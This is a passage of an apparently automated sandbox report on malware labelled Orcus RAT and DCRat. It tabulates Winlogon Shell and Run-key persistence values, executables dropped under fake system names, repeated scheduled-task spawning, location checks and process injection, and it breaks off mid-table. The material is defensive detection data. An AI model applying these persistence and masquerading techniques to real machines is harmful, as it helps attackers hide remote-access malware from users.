| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\", \"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\", \"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\runtimesvc.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Orcus
Orcus family
Orcus main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Recovery\\WindowsRE\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Security\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\Templates\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Recovery\\WindowsRE\\taskhostw.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\security\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\uk-UA\\fontdrvhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Default User\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Recovery\\WindowsRE\\upfc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default\\Templates\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\uk-UA\\fontdrvhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Recovery\\WindowsRE\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Default User\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\security\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MpDefenderCoreProtion = "\"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtimesvc = "\"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Defender\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Recovery\\WindowsRE\\taskhostw.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Security\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MpDefenderCoreProtion = "\"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Recovery\\WindowsRE\\upfc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\CSCD8D644E09FC241AA8996A8F16E59FB8.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\8zj1cq.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2168 set thread context of 4504 | N/A | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Mail\MpDefenderCoreProtion.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Windows Mail\6127aafe535d1c | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\cmd.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Internet Explorer\SIGNUP\dllhost.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Security\cmd.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Security\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Defender\cmd.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\e6c9b481da804f | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Internet Explorer\SIGNUP\5940a34987c991 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\SIGNUP\66fc9ff0ee96c2 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\0a1fd5f707cd16 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\OfficeClickToRun.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\SIGNUP\sihost.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Program Files\Windows Defender\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\sppsvc.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
